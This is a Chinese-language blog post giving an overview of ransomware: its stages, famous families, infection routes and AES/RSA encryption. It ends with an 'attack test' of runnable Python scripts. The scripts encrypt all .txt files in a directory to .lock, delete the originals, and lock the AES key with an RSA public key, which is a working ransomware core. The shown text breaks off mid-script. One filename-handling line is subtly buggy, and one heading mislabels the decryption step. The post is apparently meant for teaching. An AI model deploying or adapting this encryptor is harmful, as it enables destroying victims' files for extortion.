<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>勒索病毒概述与常见攻击手法 | opvow's notebook</title><meta name="author" content="opvow"><meta name="copyright" content="opvow"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="流程勒索病毒（Ransomware）是一种恶意软件，它通过加密目标系统上的文件，进而威胁受害者支付赎金才能解锁文件。其工作原理通常分为以下几个阶段：入侵与感染：勒索病毒通过各种手段渗透到目标计算机，并获得执行的权限。加密：一旦病毒在系统中获得执行权限，它会加密文件，使文件无法打开或使用。勒索：加密后，攻击者会使主机显示勒索信息，要求受害者支付赎金才能获取解密密钥。赎金支付：在支付赎金后，受害者可能">
<meta property="og:type" content="article">
<meta property="og:title" content="勒索病毒概述与常见攻击手法">
<meta property="og:url" content="https://opvow.github.io/posts/770d9e62.html">
<meta property="og:site_name" content="opvow&#39;s notebook">
<meta property="og:description" content="流程勒索病毒（Ransomware）是一种恶意软件，它通过加密目标系统上的文件，进而威胁受害者支付赎金才能解锁文件。其工作原理通常分为以下几个阶段：入侵与感染：勒索病毒通过各种手段渗透到目标计算机，并获得执行的权限。加密：一旦病毒在系统中获得执行权限，它会加密文件，使文件无法打开或使用。勒索：加密后，攻击者会使主机显示勒索信息，要求受害者支付赎金才能获取解密密钥。赎金支付：在支付赎金后，受害者可能">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://opvow.github.io/img/post_cover/default.png">
<meta property="article:published_time" content="2024-11-05T10:25:48.000Z">
<meta property="article:modified_time" content="2024-11-06T06:51:02.702Z">
<meta property="article:author" content="opvow">
<meta property="article:tag" content="恶意软件">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://opvow.github.io/img/post_cover/default.png"><link rel="shortcut icon" href="/img/icon.png"><link rel="canonical" href="https://opvow.github.io/posts/770d9e62.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', 'ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"TTRDOHWPL9","apiKey":"1c1d4f212912a245a557ae95ebb32cad","indexName":"my-hexo-blog","hitsPerPage":6,"languages":{"input_placeholder":"搜索文章","hits_empty":"未找到符合您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，耗时 ${time} 毫秒"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":600,"languages":{"author":"作者: opvow","link":"链接: ","source":"来源: opvow's notebook","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"已切换为繁体中文","cht_to_chs":"已切换为简体中文","day_to_night":"已切换为深色模式","night_to_day":"已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#1f1f1f","position":"bottom-center"},
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: false,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '勒索病毒概述与常见攻击手法',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  isShuoshuo: false
}</script><link rel="stylesheet" href="../css/loading.css?1"><link rel="stylesheet" href="../css/transparency.css"><link rel="stylesheet" href="../css/social_iconfont.css"><meta name="generator" content="Hexo 7.3.0"></head><body><div id="loading-box" onclick="document.getElementById(&quot;loading-box&quot;).classList.add(&quot;loaded&quot;)"><div class="loading-bg"><div class="loading-img"></div><div class="loading-image-dot"></div></div></div><script>const preloader = {
  endLoading: () => {
    document.body.style.overflow = 'auto';
    document.getElementById('loading-box').classList.add("loaded")
  },
  initLoading: () => {
    document.body.style.overflow = '';
    document.getElementById('loading-box').classList.remove("loaded")

  }
}
window.addEventListener('load',()=> { preloader.endLoading() })

if (false) {
  document.addEventListener('pjax:send', () => { preloader.initLoading() })
  document.addEventListener('pjax:complete', () => { preloader.endLoading() })
}</script><script>window.paceOptions = {
  restartOnPushState: false
}

btf.addGlobalFn('pjaxSend', () => {
  Pace.restart()
}, 'pace_restart')

</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js/themes/blue/pace-theme-minimal.min.css"/><script src="https://cdn.jsdelivr.net/npm/pace-js/pace.min.js"></script><div id="web_bg" style="background-image: url(/img/background.png);"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">39</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">31</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">12</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> 娱乐</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/images/"><i class="fa-fw fas fa-image"></i><span> 图库</span></a></li><li><a class="site-page child" href="/games/"><i class="fa-fw fas fa-gamepad"></i><span> 游戏</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg fixed" id="page-header" style="background: transparent;"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">opvow's notebook</span></a><a class="nav-page-title" href="/"><span class="site-name">勒索病毒概述与常见攻击手法</span></a></span><div id="menus"><div id="search-button"><span class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></span></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> 娱乐</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/images/"><i class="fa-fw fas fa-image"></i><span> 图库</span></a></li><li><a class="site-page child" href="/games/"><i class="fa-fw fas fa-gamepad"></i><span> 游戏</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">勒索病毒概述与常见攻击手法</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2024-11-05T10:25:48.000Z" title="发表于 2024-11-05 18:25:48">2024-11-05</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2024-11-06T06:51:02.702Z" title="更新于 2024-11-06 14:51:02">2024-11-06</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><h1 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h1><p>勒索病毒（Ransomware）是一种恶意软件，它通过加密目标系统上的文件，进而威胁受害者支付赎金才能解锁文件。其工作原理通常分为以下几个阶段：<br>入侵与感染：勒索病毒通过各种手段渗透到目标计算机，并获得执行的权限。<br>加密：一旦病毒在系统中获得执行权限，它会加密文件，使文件无法打开或使用。<br>勒索：加密后，攻击者会使主机显示勒索信息，要求受害者支付赎金才能获取解密密钥。<br>赎金支付：在支付赎金后，受害者可能获得解密密钥（但也不一定能成功解密），也有可能完全无法恢复数据。</p>
<h1 id="常见勒索病毒"><a href="#常见勒索病毒" class="headerlink" title="常见勒索病毒"></a>常见勒索病毒</h1><p>1.WannaCry<br>WannaCry是最著名的勒索病毒之一，2017年广泛传播，利用Windows SMB漏洞（MS17-010）进行传播。它对全球数以万计的计算机造成了影响<br>2.Petya&#x2F;NotPetya<br>Petya&#x2F;NotPetya是另外一款著名的勒索病毒，它通过利用Windows SMB协议漏洞传播，且感染后会加密硬盘的主引导记录（MBR）<br>它的一个显著特点是，不仅加密文件，还可能破坏计算机的引导区域，使得计算机无法正常启动<br>3.Ryuk<br>Ryuk是一种定向攻击型勒索病毒，主要攻击大型企业和政府机构，通常通过钓鱼邮件传播，攻击者会先通过其他方式进入网络，然后部署Ryuk来加密数据<br>4.Locky<br>Locky也是一种非常流行的勒索病毒，它通常通过钓鱼邮件传播，邮件中包含一个伪装成发票或其他文档的恶意附件<br>5.Cerber<br>Cerber是另一款常见的勒索病毒，通常通过邮件附件传播，具有多个版本，可以绕过一些防病毒软件的检测</p>
<h1 id="攻击手段"><a href="#攻击手段" class="headerlink" title="攻击手段"></a>攻击手段</h1><p>1.电子邮件钓鱼攻击<br>电子邮件是勒索病毒最常见的传播途径之一。攻击者发送伪装成正常邮件的附件或链接，诱使用户点击<br>附件可能是一个带有恶意宏的文档，或者是一个可执行文件<br>点击后，恶意文件会下载并执行，开始勒索病毒的传播</p>
<p>2.恶意网站与广告<br>索病毒可以通过恶意网站或通过网页广告传播，通常会利用浏览器漏洞（如Flash、Java等）执行恶意代码<br>用户只需访问包含恶意广告或漏洞利用的页面，勒索病毒就可能通过“驱动下载”进行传播<br>3.漏洞利用<br>索病毒也会利用操作系统或软件的漏洞进行传播。例如，攻击者可以通过利用Windows SMB（Server Message Block）漏洞（如WannaCry病毒所做的）来传播勒索病毒<br>病毒可以直接通过网络连接攻击目标主机，绕过防火墙、杀毒软件等安全措施<br>4.网络钓鱼与社工<br>攻击者通过社交工程欺骗受害者下载和执行病毒。例如，假冒系统更新、伪装成免费软件<br>5.rdp暴力破解<br>勒索病毒可以通过暴力破解Windows RDP服务的密码进入目标主机，上传勒索病毒感染并加密文件<br>6.物理接入<br>勒索病毒可以通过USB驱动器传播，攻击者将病毒拷贝到U盘中，用户插入U盘后，病毒通过自动播放传播</p>
<h1 id="常见加密"><a href="#常见加密" class="headerlink" title="常见加密"></a>常见加密</h1><h2 id="AES对称加密"><a href="#AES对称加密" class="headerlink" title="AES对称加密"></a>AES对称加密</h2><p>勒索病毒通常使用对称加密（如AES）对目标文件进行加密。对称加密算法的特点是加密和解密使用同一个密钥。<br>恶意软件会生成一个随机密钥（称为“会话密钥”），然后使用目标机器的公开密钥加密这个密钥。这样，即使加密数据被拦截，攻击者也无法解密。</p>
<h2 id="RSA非对称加密"><a href="#RSA非对称加密" class="headerlink" title="RSA非对称加密"></a>RSA非对称加密</h2><p>在某些勒索病毒中，攻击者会使用非对称加密（例如RSA）加密文件。非对称加密需要一对密钥：公钥和私钥。<br>受害者通过公钥加密数据，但只有攻击者拥有解密用的私钥。</p>
<h1 id="攻击测试"><a href="#攻击测试" class="headerlink" title="攻击测试"></a>攻击测试</h1><p>本次测试使用aes密钥对目录下txt后缀文件进行加密，使用rsa公钥对aes密钥加密获得aes加密密钥，加密后缀为lock<br>模拟攻击者上传aes加密密钥。用户若想解密文件，则需要向攻击者取得rsa的私钥对aes加密密钥进行解密，然后通过aes密钥对加密文件解密</p>
<h2 id="生成AES密钥"><a href="#生成AES密钥" class="headerlink" title="生成AES密钥"></a>生成AES密钥</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># aes_key.py</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_aes_key</span>():</span><br><span class="line">    <span class="comment"># 生成 128 位 AES 密钥（16 字节）</span></span><br><span class="line">    aes_key = os.urandom(<span class="number">16</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;AES 密钥: <span class="subst">&#123;aes_key.<span class="built_in">hex</span>()&#125;</span>&quot;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 保存密钥到文件</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;aes_key.bin&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        f.write(aes_key)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;AES 密钥已保存到 aes_key.bin&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    generate_aes_key()</span><br></pre></td></tr></table></figure>

<h2 id="aes加密文件"><a href="#aes加密文件" class="headerlink" title="aes加密文件"></a>aes加密文件</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.Padding <span class="keyword">import</span> pad</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt_file</span>(<span class="params">file_path, aes_key</span>):</span><br><span class="line">    <span class="comment"># 创建 AES 加密器</span></span><br><span class="line">    cipher = AES.new(aes_key, AES.MODE_CBC)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 读取文件内容</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">        file_data = file.read()</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 填充数据并加密</span></span><br><span class="line">    encrypted_data = cipher.encrypt(pad(file_data, AES.block_size))</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 创建加密后的文件路径，并修改后缀为 .lock</span></span><br><span class="line">    encrypted_file_path = file_path.rstrip(<span class="string">&#x27;.txt&#x27;</span>) + <span class="string">&#x27;.lock&#x27;</span>  <span class="comment"># 替换 .txt 后缀为 .lock</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 保存加密后的数据到文件</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(encrypted_file_path, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> encrypted_file:</span><br><span class="line">        encrypted_file.write(cipher.iv + encrypted_data)  <span class="comment"># 包括 IV 作为文件的前缀</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 删除原文件</span></span><br><span class="line">    os.remove(file_path)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 输出加密成功信息</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;文件 <span class="subst">&#123;file_path&#125;</span> 已加密并保存为 <span class="subst">&#123;encrypted_file_path&#125;</span>，原文件已删除。&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt_txt_files</span>(<span class="params">aes_key</span>):</span><br><span class="line">    <span class="comment"># 遍历当前目录下的所有 .txt 文件并加密</span></span><br><span class="line">    <span class="keyword">for</span> file_name <span class="keyword">in</span> os.listdir():</span><br><span class="line">        <span class="keyword">if</span> file_name.endswith(<span class="string">&#x27;.txt&#x27;</span>):</span><br><span class="line">            encrypt_file(file_name, aes_key)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># 读取保存的 AES 密钥（假设密钥是保存为 aes_key.bin）</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;aes_key.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        aes_key = f.read()</span><br><span class="line">    </span><br><span class="line">    encrypt_txt_files(aes_key)</span><br></pre></td></tr></table></figure>

<h2 id="rsa公私钥生成"><a href="#rsa公私钥生成" class="headerlink" title="rsa公私钥生成"></a>rsa公私钥生成</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># rsa_keys.py</span></span><br><span class="line"><span class="keyword">import</span> rsa</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_rsa_keys</span>():</span><br><span class="line">    <span class="comment"># 生成 2048 位的 RSA 密钥对</span></span><br><span class="line">    public_key, private_key = rsa.newkeys(<span class="number">2048</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 保存公钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;rsa_public_key.pem&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> pub_file:</span><br><span class="line">        pub_file.write(public_key.save_pkcs1())</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 保存私钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;rsa_private_key.pem&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> priv_file:</span><br><span class="line">        priv_file.write(private_key.save_pkcs1())</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;RSA 公钥和私钥已生成并保存为 rsa_public_key.pem 和 rsa_private_key.pem&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    generate_rsa_keys()</span><br></pre></td></tr></table></figure>

<h2 id="rsa公钥加密aes"><a href="#rsa公钥加密aes" class="headerlink" title="rsa公钥加密aes"></a>rsa公钥加密aes</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># rsa_encrypt_aes_key.py</span></span><br><span class="line"><span class="keyword">import</span> rsa</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt_aes_key_with_rsa</span>(<span class="params">aes_key</span>):</span><br><span class="line">    <span class="comment"># 读取 RSA 公钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;rsa_public_key.pem&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> pub_file:</span><br><span class="line">        pub_key_data = pub_file.read()</span><br><span class="line">        public_key = rsa.PublicKey.load_pkcs1(pub_key_data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 使用 RSA 公钥加密 AES 密钥</span></span><br><span class="line">    encrypted_aes_key = rsa.encrypt(aes_key, public_key)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 保存加密后的 AES 密钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;encrypted_aes_key.bin&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> enc_file:</span><br><span class="line">        enc_file.write(encrypted_aes_key)</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;AES 密钥已使用 RSA 公钥加密并保存为 encrypted_aes_key.bin&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete_original_aes_key</span>():</span><br><span class="line">    <span class="comment"># 删除原始 AES 密钥文件</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        os.remove(<span class="string">&quot;aes_key.bin&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;原始 AES 密钥文件 aes_key.bin 已删除&quot;</span>)</span><br><span class="line">    <span class="keyword">except</span> FileNotFoundError:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;原始 AES 密钥文件 aes_key.bin 未找到&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># 读取 AES 密钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;aes_key.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        aes_key = f.read()</span><br><span class="line">    </span><br><span class="line">    encrypt_aes_key_with_rsa(aes_key)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 删除原始 AES 密钥文件</span></span><br><span class="line">    delete_original_aes_key()</span><br></pre></td></tr></table></figure>

<h2 id="rsa公钥解密aes"><a href="#rsa公钥解密aes" class="headerlink" title="rsa公钥解密aes"></a>rsa公钥解密aes</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> rsa</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt_aes_key_with_rsa</span>():</span><br><span class="line">    <span class="comment"># 读取 RSA 私钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;rsa_private_key.pem&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> priv_file:</span><br><span class="line">        priv_key_data = priv_file.read()</span><br><span class="line">        private_key = rsa.PrivateKey.load_pkcs1(priv_key_data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 读取加密的 AES 密钥</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;encrypted_aes_key.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> enc_file:</span><br><span class="line">        encrypted_aes_key = enc_file.read()</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 使用 RSA 私钥解密 AES 密钥</span></span><br><span class="line">    decrypted_aes_key = rsa.decrypt(encrypted_aes_key, private_key)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 打印解密后的 AES 密钥</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;解密后的 AES 密钥: <span class="subst">&#123;decrypted_aes_key.<span class="built_in">hex</span>()&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 将解密后的 AES 密钥保存到 decrypt_aes_key.bin 文件</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;decrypt_aes_key.bin&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span 